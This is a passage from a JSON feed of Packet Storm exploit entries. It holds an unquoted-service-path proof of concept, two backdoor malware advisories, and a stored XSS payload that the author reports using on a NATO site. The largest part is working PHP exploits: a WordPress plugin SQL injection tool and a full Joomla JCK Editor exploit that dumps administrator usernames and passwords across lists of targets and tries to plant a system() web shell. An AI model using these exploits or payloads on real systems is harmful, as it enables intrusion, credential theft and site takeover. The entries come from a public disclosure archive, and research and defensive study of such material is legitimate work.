"Print Job Accounting 4.4.10 Unquoted Service Path", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161690", "href": "https://packetstormsecurity.com/files/161690/Print-Job-Accounting-4.4.10-Unquoted-Service-Path.html", "sourceData": "`# Exploit Title: Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path \n# Discovery by: Brian Rodriguez \n# Date: 07-03-2021 \n# Vendor Homepage: https://www.oki.com \n# Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46229002&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6 \n# Tested Version: 4.4.10 \n# Vulnerability Type: Unquoted Service Path \n# Tested on: Windows 8.1 Pro 64 bits \n \nC:\\Windows\\system32>wmic service get name, displayname, pathname, startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v \"\"\" \nOKI Local Port Manager              OpLclSrv    C:\\Program Files\\Okidata\\Common\\Extend3\\portmgrsrv.exe \nPrint Job Accounting                OkiJaSvc    C:\\Program Files\\Okidata\\Print Job Accounting\\oklogsvc.exe \nPrint Job Accounting Watch Service  OkiWchSvc   C:\\Program Files\\Okidata\\Print Job Accounting\\okwchsvc.exe \nPrint Job Accounting opja0004       opja0004    C:\\Program Files\\Okidata\\Print Job Accounting\\opja0004.exe \n \nC:\\Windows\\system32>sc qc OkiJaSvc \n[SC] QueryServiceConfig SUCCESS \n \nSERVICE_NAME: OkiJaSvc \n        TYPE               : 10  WIN32_OWN_PROCESS \n        START_TYPE         : 2   AUTO_START \n        ERROR_CONTROL      : 1   NORMAL \n        BINARY_PATH_NAME   : C:\\Program Files\\Okidata\\Print Job Accounting\\oklogsvc.exe \n        LOAD_ORDER_GROUP   : \n        TAG                : 0 \n        DISPLAY_NAME       : Print Job Accounting \n        DEPENDENCIES       : \n        SERVICE_START_NAME : LocalSystem \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161690/pja410-unquotedpath.txt"}, {"lastseen": "2021-03-08T16:21:51", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "Backdoor.Win32.Antilam.14.o Code Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161676", "href": "https://packetstormsecurity.com/files/161676/Backdoor.Win32.Antilam.14.o-Code-Execution.html", "sourceData": "`Discovery / credits: Malvuln - malvuln.com (c) 2021 \nOriginal source: https://malvuln.com/advisory/3f3ee9dce39e816b4001bd6ae66e8f1a.txt \nContact: malvuln13@gmail.com \nMedia: twitter.com/malvuln \n \nThreat: Backdoor.Win32.Antilam.14.o \nVulnerability: Unauthenticated Remote Command Execution \nDescription: The malware listens on TCP ports 47891 and 29559. Third-party attackers who can reach infected systems can execute commands made available by the backdoor. The Netcat utility worked best for running commands, which are supplied as numeric values or hex characters. The values sent correspond to different commands mapped in the backdoor. 
Example, to get the date/time we can enter 015 or the hex value 0xF. \nType: PE32 \nMD5: 3f3ee9dce39e816b4001bd6ae66e8f1a \nVuln ID: MVID-2021-0121 \nDropped files: scandisk.exe \nDisclosure: 03/06/2021 \n \nExploit/PoC: \nnc64.exe x.x.x.x 47891 \n \n001 + Enter (Gets system info) \n \n001\u2567\u03b1\u2229\u03a9\u03b1 Windows: C:\\WINDOWS \n\u2567\u03b1\u2229\u03a9\u03b1 System: \n\u2567\u03b1\u2229\u03a9\u03b1 Temp: C:\\Users\\victim\\AppData\\Local\\Temp\\ \n\u252c\u03c3\u2261\u00b1\u03a6Windows: Windows NT 6.2 9200 \n\u2560\u03a6\u03c6\u2264\u2265 \u0393 Windows: 15 \n\u255a\u221e\u03a9\u03b5\u221e\u2229\u03b1: DESKTOP-3A2IQHO \n\u255a\u221e\u25a0\u03c4\u03c3\u2261\u03b1: victim \n\u2580\u03c4\u221a\u03a9 Windows: English (United States) \n\u2568\u03b1\u03c4\u2261\u03c3\u00b0\u03c3\u03c6\u03a6\u03c3: 1554x840 \nNumLock: Off \nCapsLock: \nScrollLock: Off \n\u2261\u03b5\u03a6\u03c0\u2261\u221a\u0393\u03b1\u03c6\u03a6\u03c3 \u03c4\u0393\u2264\u03a9\u03b1: \u2500\u03b1 \n\u2564\u0393\u03b5\u00df\u03b5\u03a3\u03c6\u03b5\u03c3 \u221e\u03c3\u00b1\u2265\u03b5 \u03c6\u03b1 \u03a3\u03a6\u00b1\u03a9\u03c3: 2,554,454,016 \n\u2552\u03b5\u00b1\u2265: DESKTOP-3A2IQHO \n\u2569\u03b4\u03a6\u03c3\u03c6\u2265\u03b5\u0393 \u2229\u03b5\u03a3\u03a9\u03b4\u25a0\u2248\u03c3\u03c6\u03b5: 7 \n \nOther commands: \n \n004 TaskBar \n007 Monitor \n008 Ctrl+Alt+Del \n009 ScrollLock \n010 or 0xA (HEX) CapsLock \n011 NumLock \n012 CD-ROM \n015 or 0xF(HEX) Get Date/Time \n018 Mouse has been unlocked \n022 Shell Experience HostCommand Prompt Promptrator) \n029 lists current dir malware is running from \n033 (logout the remote system) \n082 exit netcat session \n111 lists file C:\\Users\\victim\\AppData\\Local\\Temp\\scrsm.src \n115 starts packman animation that eats the screen \n116 stops packman animation \n120 Web browser \n \nDisclaimer: The information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. 
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161676/MVID-2021-0121.txt"}, {"lastseen": "2021-03-08T16:23:21", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "Backdoor.Win32.Agent.bjev Insecure Permissions", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161685", "href": "https://packetstormsecurity.com/files/161685/Backdoor.Win32.Agent.bjev-Insecure-Permissions.html", "sourceData": "`Discovery / credits: Malvuln - malvuln.com (c) 2021 \nOriginal source: https://malvuln.com/advisory/35cf54a19efcdeaa41899647075c7ef9.txt \nContact: malvuln13@gmail.com \nMedia: twitter.com/malvuln \n \nThreat: Backdoor.Win32.Agent.bjev \nVulnerability: Insecure Permissions \nDescription: Agent.bjev creates an insecure dir named \"Windupdt\" under c:\\ drive, granting change permissions (C) to the authenticated user group. Standard users can rename the malware to disable it or replace with their own executable. 
Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. \nType: PE32 \nMD5: 35cf54a19efcdeaa41899647075c7ef9 \nVuln ID: MVID-2021-0123 \nDropped files: winupdate.exe \nDisclosure: 03/06/2021 \n \nExploit/PoC: \nC:\\>cacls \\Windupdt \nC:\\Windupdt BUILTIN\\Administrators:(OI)(CI)(ID)F \nNT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F \nBUILTIN\\Users:(OI)(CI)(ID)R \nNT AUTHORITY\\Authenticated Users:(ID)C \nNT AUTHORITY\\Authenticated Users:(OI)(CI)(IO)(ID)C \n \nC:\\Windupdt>dir /a \nVolume in drive C has no label. \n \nDirectory of C:\\Windupdt \n \n06/17/2012 12:16 AM 974,848 winupdate.exe \n1 File(s) 974,848 bytes \n \n \nDisclaimer: The information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). 
\n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161685/MVID-2021-0123.txt"}, {"lastseen": "2021-03-08T16:21:52", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "Joomla Matukio Events 7.0.5 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161682", "href": "https://packetstormsecurity.com/files/161682/Joomla-Matukio-Events-7.0.5-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Joomla Matukio Events 7.0.5 Stored XSS \n# Date: 08.03.2021 \n# Author: Vincent666 ibn Winnie \n# Software Link: https://matukio.compojoom.com/ \n# Tested on: Windows 10 \n# Web Browser: Mozilla Firefox \n# My Youtube Channel : https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ \n# Google Dorks: inurl:option=com_matukio \n \n \nPoC: \n \nI found a simple, but interesting stored XSS in Matukio Events. \n \nhttps://matukio.compojoom.com/events/event/81-science/979-rocket-science \n \nPress \"Book Now\": \n \nThe \"Comments\" field is vulnerable to XSS and HTML code injection. \n \nPut XSS code in and save it. It works with different codes. 
\n \nThe code I like for the test: \n \nhttps://pastebin.com/4V9sS7V3 \n \n \nVideo: \n \nhttps://youtu.be/HlTEcDqNxSM \n \nExample on another site events.sto.nato.int \n \nhttps://www.youtube.com/watch?v=pBY2UskIuNU \n \n \n \nHost: matukio.compojoom.com \n \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) \nGecko/20100101 Firefox/86.0 \n \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \n \nAccept-Language: en-US;q=0.5,en;q=0.3 \n \nAccept-Encoding: gzip, deflate, br \n \nContent-Type: multipart/form-data; \nboundary=---------------------------9492328303638924271813324098 \n \nContent-Length: 2816 \n \nOrigin: https://matukio.compojoom.com \n \nConnection: keep-alive \n \nReferer: https://matukio.compojoom.com/events/book/979-rocket-science \n \nCookie: d9122e5739e92113272e5173db43cd67=72qdv1oufsi2avknr7614genno; \n_ga=GA1.2.90714308.1615201744; _gid=GA1.2.178258541.1615201744 \n \nUpgrade-Insecure-Requests: 1 \n \nnrbooked=1&coupon_code=&field[3]=Mr&field[4]=&field[5]=azsxc&field[6]=ASD&field[8]=azsxc&field[9]=112233&field[10]=Zasx&field[11]=algeria&field[13]=vsdv@dklelw.de&field[14]=&field[15]=&field[16]=&field[17]=<style>body{visibility:hidden;}html{background: \nurl(https://img5.goodfon.ru/wallpaper/nbig/6/5d/kholst-kraska-mazki-abstraktsiia-canvas-paint-brush-strokes.jpg) \nround;}</style><script>alert(\"Test \nXSS\")</script>&agb=Yes&revoke=Yes&uuid=&task=book.book&semid=979&formId=1&61c98812f3351c5686829fce5947bf84=1 \n \n(p.s.: \nI don't publicly test the Joomla extensions anymore, but this time I \nposted it publicly because I did xss art on the NATO site in this \ncomponent.) 
\n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161682/joomlamatukioevents705-xss.txt"}, {"lastseen": "2021-03-08T16:21:47", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "WordPress SuperStoreFinder / SuperInteractiveMaps 6.3 SQL Injection", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161689", "href": "https://packetstormsecurity.com/files/161689/WordPress-SuperStoreFinder-SuperInteractiveMaps-6.3-SQL-Injection.html", "sourceData": "`<?php \n#Title : SuperStoreFinder & SuperInteractiveMaps Wordpress Plugin SQL Injection \n#Researcher : Eagle Eye \n#Exploit Name : SSF & SIM SQL Injection \n#Request type : POST \n#Plugin Author : Joe lz \n#Plugin Website : https://superstorefinder.net/ \n#Version Affected : All version (include latest 6.3) \n#Date : 07/03/2021 \n#Tested on : Google Chrome,FireFox, Window 10 64bit \n#Vuln parameter = ssf_wp_id \n#Vuln ssf path : /wp-content/plugins/superstorefinder-wp/ssf-social-action.php \n#Vuln sim path : /wp-content/plugins/super-interactive-maps/sim-wp-data.php \nfunction filtration($input) \n{ \n$dis = '/\"/i'; \n$item = preg_replace($dis,\"\",$input); \necho $item; \n} \nfunction http_request($target,$toPost) \n{ \n$ch = curl_init(); \ncurl_setopt($ch,CURLOPT_HEADER,0); \ncurl_setopt($ch,CURLOPT_RETURNTRANSFER,1); \ncurl_setopt($ch,CURLOPT_URL,$target); \ncurl_setopt($ch,CURLOPT_POST,1); \ncurl_setopt($ch,CURLOPT_POSTFIELDS,$toPost); \n$data = curl_exec($ch); \n \nif(curl_errno($ch)) \n{ \nprint curl_error($ch); \n} \nelse \n{ \necho $data; \n} \ncurl_close($ch); \n} \n \nif(isset($_POST['inject'])) \n{ \nswitch($_POST['plugin']) \n{ \ncase 'ssf': \n$toPost = \"action=\".$_POST['action'].\"&ssf_wp_id=\".$_POST['id']; \n$target = $_POST['target']. 
\n\"/wp-content/plugins/superstorefinder-wp/ssf-social-action.php\"; \nhttp_request($target,$toPost); \nbreak; \ncase 'sim': \n$toPost = \"id=\".$_POST['id']; \n$target = $_POST['target']. \n\"/wp-content/plugins/super-interactive-maps/sim-wp-data.php\"; \nhttp_request($target,$toPost); \nbreak; \n} \n} \n?> \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161689/wpssfsim63-sql.txt"}, {"lastseen": "2021-03-08T16:21:32", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "Joomla JCK Editor 6.4.4 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17254"], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161683", "href": "https://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html", "sourceData": "`# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2) \n# Google Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/ \n# Date: 05/03/2021 \n# Exploit Author: Nicholas Ferreira \n# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor \n# Version: 6.4.4 \n# Tested on: Debian 10 \n# CVE : CVE-2018-17254 \n# PHP version (exploit): 7.3.27 \n# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa \n \n<?php \n \n$vuln_file = '/editors/jckeditor/plugins/jtreelink/dialogs/links.php'; \n \nfunction payload($str1, $str2=\"\"){ \nreturn '?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,'.$str1.',NULL,NULL,NULL,NULL,NULL'.$str2.'--%20aa'; #\" \n} \n \n \nfunction get_request($url){ \n$ch = curl_init(); \ncurl_setopt($ch, CURLOPT_URL, $url); \ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); \ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); \n#curl_setopt($ch, CURLOPT_PROXY, \"127.0.0.1:8080\"); \n$output = curl_exec($ch); \ncurl_close($ch); \nreturn $output; \n} \n 
\nfunction parse_columns($columns){ \n$parsed_columns = array(); \nforeach($columns as $col){ \narray_push($parsed_columns, $col); \narray_push($parsed_columns, \"0x242324\"); //delimiter = $#$ \n} \nreturn $parsed_columns; \n} \n \nfunction inject($url, $payload){ \nglobal $vuln_file; \n$request = get_request($url.$vuln_file.$payload); \npreg_match_all('/url =\"(.*)\">/', $request, $output); \nreturn $output; \n} \n###### \n \nfunction is_vulnerable($url){ \nglobal $vuln_file; \n$output = inject($url, payload(\"0x6861636b6564\")); \nif(isset($output[1][0])){ \nif(base64_encode($output[1][0]) == \"aGFja2Vk\"){ //checking if we can inject \nreturn 1; \n} \n} \nreturn 0; \n} \n \nfunction get_db_names($url){ \nglobal $vuln_file; \n$db_names = array(); \n$output = inject($url, payload(\"schema_name\", \"%20from%20information_schema.schemata\")); \nforeach($output[1] as $db){ \narray_push($db_names, $db); \n} \nreturn $db_names; \n} \n \nfunction get_table_names($url, $db){ \nglobal $vuln_file; \n$table_names = array(); \n$output = inject($url, payload(\"table_name\", \"%20from%20information_schema.tables%20WHERE%20table_schema=%27\".$db.\"%27\")); \nforeach($output as $table){ \narray_push($table_names, $table); \n} \nreturn $table_names; \n} \n \nfunction get_column_names($url, $table){ \nglobal $vuln_file; \n$column_names = array(); \n$output = inject($url, payload(\"column_name\", \"%20from%20information_schema.columns%20WHERE%20table_name=%27\".$table.\"%27\")); \nforeach($output as $column){ \narray_push($column_names, $column); \n} \nreturn $column_names; \n} \n \nfunction dump_columns($url, $columns, $dbname, $table){ \nglobal $vuln_file; \n$column_dump = array(); \n$related_arr = array(); \n$data = array(); \n$output = inject($url, payload(\"concat(\".implode(',', parse_columns($columns)).\")\", \"%20from%20\".$dbname.\".\".$table)); \nforeach($output[1] as $column){ \n$exploded = explode(\"$#$\", $column); \narray_push($data, $exploded); \n} \nforeach($data 
as $user_info){ \narray_pop($user_info); \narray_push($related_arr, array_combine($columns, $user_info)); \n} \nreturn $related_arr; \n} \n \nfunction rce($url){ //probably won't work =( \nglobal $vuln_file; \nif(!is_vulnerable($url)){ \ndie(red(\"[-] Target isn't vulnerable.\")); \n} \n$server_root = array(\"/var/www/\", \"/var/www/html/\", \"/usr/local/apache2/htdocs/\", \"/var/www/nginx-default/\", \"/srv/www/\", \"/usr/local/apache2/htdocs/\"); \n$rand_content = \"AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2\"; \n$payl0ad = \"'<?php system(\\$_GET[0]); ?> \".$rand_content.\"'\"; \n$filename = rand(1000, 7359).\".php\"; \necho cyan(\"[i]\").\" Trying to upload a RCE shell...\\n\"; \nforeach($server_root as $path){ \ninject($url, payload($payl0ad, \" INTO OUTFILE '\".$path.$filename.\"'\")); \n} \n$get_shell = get_request($url.\"/\".$filename); \nif(strpos($get_shell, $rand_content) !== false){ \necho green(\"[+] RCE shell successfully uploaded! =)\\n\"); \ndie(\"Usage: \".$url.\"/\".$filename.\"?0=whoami\\n\"); \n}else{ \necho(red(\"[-] \").\"Could not upload RCE shell. Maybe stacked queries are not supported. =(\\n\"); \ndie(cyan(\"[i] \").\"But you can still inject SQL commands! What about dumping the users table? 
=)\\n\"); \n} \n} \n \nfunction read_file($url, $file){ \nglobal $vuln_file; \n} \n \n############ \n \nfunction green($str){ \nreturn \"\\e[92m\".$str.\"\\e[0m\"; \n} \nfunction red($str){ \nreturn \"\\e[91m\".$str.\"\\e[0m\"; \n} \nfunction yellow($str){ \nreturn \"\\e[93m\".$str.\"\\e[0m\"; \n} \nfunction cyan($str){ \nreturn \"\\e[96m\".$str.\"\\e[0m\"; \n} \n \nfunction banner(){ \necho \" \n___ _____ _ __ _____ \n|_ |/ __ \\| | / /| _ \\ \n| || / \\/| |/ / | | | | _ _ _ __ ___ _ __ ___ _ _ \n| || | | \\ | | | || | | || '_ ` _ \\ | '_ \\ / _ \\| '__| \n/\\__/ /| \\__/\\| |\\ \\| |/ / | |_| || | | | | || |_) || __/| | \n\\____/ \\____/\\_| \\_/|___/ \\__,_||_| |_| |_|| .__/ \\___||_| \n\".green(\"Coder: \").yellow(\"Nicholas Ferreira\").\" | | \n|_| \n \n\"; \n} \n$target = 0; \n$rce = 0; \nfunction check(){ \nglobal $argv; \nglobal $argc; \nglobal $target; \nglobal $rce; \nglobal $target_list; \nglobal $save_output; \nglobal $verbose; \nglobal $less; \nglobal $specified_db; \n$short_args = \"u:t:v::h::l::r::d::\"; \n$long_args = array(\"url:\",\"targets::\",\"verbose::\",\"help::\",\"less::\",\"rce::\", \"db::\"); \n$options = getopt($short_args, $long_args); \n \nif(isset($options['h']) || $argc == 1 || isset($options['help'])){ \necho \"JCK Editor v6.4.4 SQL Injection exploit (CVE-2018-17254) \n \nUsage: php \".$argv[0].\" -u url [-h] [-v] [-l] [-o] [-r command] [-f list_of_targets] [-d db] \n \n-u, --url: Path to Joomla! plugins (e.g. website.com/site/plugins/) \n-h, --help: Help \n-v, --verbose: Verbose mode (print tables) \n-l, --less: Less outputs (only Administrator usernames and passwords) \n-t, --targets: Load a list of targets \n-r, --rce: Try to upload a RCE shell \n-d, --db: Specifies the DB to dump \n \n\"; \n \n} \n \nif(isset($options['u'])){ \n$target = $options['u']; \n}elseif(isset($options['url'])){ \n$target = $options['url']; \n}else{ \n$target = \"\"; \n} \n \nisset($options['v']) || isset($options['verbose']) ? 
$verbose = 1 : $verbose = 0; \nisset($options['l']) || isset($options['less']) ? $less = 1 : $less = 0; \nisset($options['r']) || isset($options['rce']) ? $rce = 1 : $rce = 0; \nisset($options['f']) ? $target_list = $options['f'] : $target_list = 0; \n \nif(isset($options['t'])){ \n$target_list = $options['t']; \n}elseif(isset($options['targets'])){ \n$target_list = $options['targets']; \n}else{ \n$target_list = 0; \n} \n \nif(isset($options['d'])){ \n$specified_db = $options['d']; \n}elseif(isset($options['db'])){ \n$specified_db = $options['db']; \n}else{ \n$specified_db = 0; \n} \n \n \nif(strlen($target_list) < 2){ \nif($target !== \"\"){ // check if URL is ok \nif(!preg_match('/^((https?:\\/\\/)|(www\\.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(\\/.*)?$/', $target)){ \ndie(red(\"[i] The target must be a URL.\\n\")); \n} \nif(strpos($target, \"plugins\") == false){ \ndie(red(\"[-] You must provide the Joomla! plugins path! (standard: exemple.com/plugins/)\\n\")); \n} \n}else{ \ndie(cyan(\"[-] \").\"You can get help with -h.\\n\"); \n} \n} \n \nif($target_list !== 0){ //check if target list is readable \nif(!file_exists($target_list)){ \ndie(red(\"[-] \").\"Could not read target list file.\\n\"); \n} \n} \n} \n \n \n \nfunction exploit($url){ // returns users and passwords \nglobal $vuln_file; \nglobal $verbose; \nglobal $rce; \nglobal $specified_db; \nglobal $less; \necho cyan(\"\\n=========================| \".str_replace(\"plugins\", \"\", $url).\" |=========================\\n\\n\\n\"); \necho cyan(\"[+] \").\"Checking if target is vulnerable...\\n\"; \nif (is_vulnerable($url)){ \n$main_db = inject($url, payload(\"database()\"))[1]; \n$user_table = \"\"; \n$hostname = inject($url, payload(\"@@hostname\"))[1]; \n$mysql_user = inject($url, payload(\"user()\"))[1]; \n$mysql_version = inject($url, payload(\"@@version\"))[1]; \n$connection_id = inject($url, payload(\"connection_id()\"))[1]; \n \necho green(\"[+] Target is vulnerable! 
=)\\n\\n\"); \necho cyan(\"[i] \").\"Hostname: \".yellow($hostname[0]).\"\\n\"; \necho cyan(\"[i] \").\"Current database: \".yellow($main_db[0]).\"\\n\"; \necho cyan(\"[i] \").\"MySQL version: \".yellow($mysql_version[0]).\"\\n\"; \necho cyan(\"[i] \").\"MySQL user: \".yellow($mysql_user[0]).\"\\n\"; \necho cyan(\"[i] \").\"Connection ID: \".yellow($connection_id[0]).\"\\n\\n\"; \n \nif($rce){ \nrce($url); \n} \n \n \necho cyan(\"[+] \").\"Getting DB names...\\n\"; \n$dbs = get_db_names($url); \nif(count($dbs) == 0){ \necho(\"[-] There are no DBs available on this target. =(\\n\"); \n} \n \n$db_list = array(); \nforeach($dbs as $db){ \n$num_table = count(get_table_names($url, $db)[1]); \necho green(\"[+] DB found: \").cyan($db.\" [\".$num_table.\" tables]\").\"\\n\"; \narray_push($db_list, $db); \n} \nif($main_db == \"\" && !$specified_db){ \necho(red(\"[-] Could not find Joomla! default DB. Try to dump another DB with -d. \\n\")); \n} \nif($specified_db !== 0){ // if user doesn't specify a custom db \necho cyan(\"\\n[+] \").\"Getting tables from \".yellow($specified_db).\"...\\n\"; \n$tables = get_table_names($url, $specified_db); \n}else{ \nforeach($db_list as $new_db){ \nif($new_db !== \"test\" && strlen(strpos($new_db, \"information_schema\") !== false) == 0){ // neither test nor i_schema \necho cyan(\"\\n[+] \").\"Getting tables from \".yellow($new_db).\"...\\n\"; \n$tables = get_table_names($url, $new_db); \n} \n} \n} \necho cyan(\"[+] \").yellow(count($tables[1])).\" tables found! \\n\"; \nif(count($tables[1]) == 0){ \necho(red(\"[-] \".\"Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. \\n\")); \n} \n \nforeach($tables[1] as $table){ \nif($verbose) echo $table.\"\\n\"; \nif(strpos($table, \"_users\") !== false){ \n$user_table = $table; \n} \n} \n \nif($user_table == \"\"){ \necho(red(\"[-] Could not find Joomla default users table. 
Try to find it manually!\\n\")); \n} \n \necho cyan(\"[+] \").\"Getting columns from \".yellow($user_table).\"...\\n\"; \n$columns = get_column_names($url, $user_table); \n \nif(count($columns) == 0){ \necho(red(\"[-] There are no columns on this table... =(\\n\")); \n} \nif($verbose){ \necho cyan(\"[+] \").\"Columns found:\\n\"; \nforeach($columns[1] as $coll){ \necho $coll.\"\\n\"; \n} \n} \necho cyan(\"[+] \").\"Dumping usernames from \".yellow($user_table).\"...\\n\"; \n \n$dump = dump_columns($url, array(\"id\",\"usertype\", \"name\",\"username\",\"password\",\"email\",\"lastvisitDate\"), $db, $user_table); \n \nif(is_array($dump) && count($dump) == 0){ \n$new_dump = dump_columns($url, array(\"id\",\"name\",\"username\",\"password\",\"email\",\"lastvisitDate\"), $db, $user_table); \nif(count($new_dump) == 0){ \necho(red(\"[-] This table is empty! =(\\n\")); \n}else{ \n$dump = $new_dump; \n$usertype = 0; \n} \n}else{ \n$usertype = 1; \n} \necho cyan(\"\\n[+] \").\"Retrieved data:\\n\"; \nforeach($dump as $user){ \nif($usertype){ \n$adm = strpos($user['usertype'], 'Administrator') !== false; \n}else{ \n$adm = false; \n} \nif($less){ \nif(strpos($user['usertype'], \"Administrator\") !== false){ \necho \"\\n=============== \".green($user['username']).\" ===============\\n\"; \nforeach($user as $key => $data){ \nif(strlen($data) > 0){ \nif($key == \"username\" || $key == \"password\" || $adm){ \necho($key.\": \".red($data).\"\\n\"); \n}else{ \necho($key.\": \".$data.\"\\n\"); \n} \n} \n} \n} \n \n}else{ \necho \"\\n=============== \".green($user['username']).\" ===============\\n\"; \nforeach($user as $key => $data){ \nif(strlen($data) > 0){ \nif($key == \"username\" || $key == \"password\" || $adm){ \necho($key.\": \".red($data).\"\\n\"); \n}else{ \necho($key.\": \".$data.\"\\n\"); \n} \n} \n} \n} \n \n} \n \necho(green(\"\\nExploit completed! =)\\n\\n\\n\")); \n \n}else{ \necho(red(\"[-] Apparently, the provided target is not vulnerable. 
=(\\n\\n\")); \necho(cyan(\"[i] \").\"This may be a connectivity issue. If you're persistent, you can try again.\\n\"); \n} \n} \n \n \nbanner(); \ncheck(); \n \nif(strlen($target_list) >1){ \n$targets = explode(PHP_EOL, file_get_contents($target_list)); //split by newline \nforeach($targets as $website){ \nif($rce){ \nrce($target); \n}else{ \nif(strlen($website) > 1){ \nexploit($website); //multiple targets \n} \n} \n} \n}else{ \nexploit($target); //single target \n} \n \n?> \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/161683/joomlajckeditor644parent-sql.txt"}]}
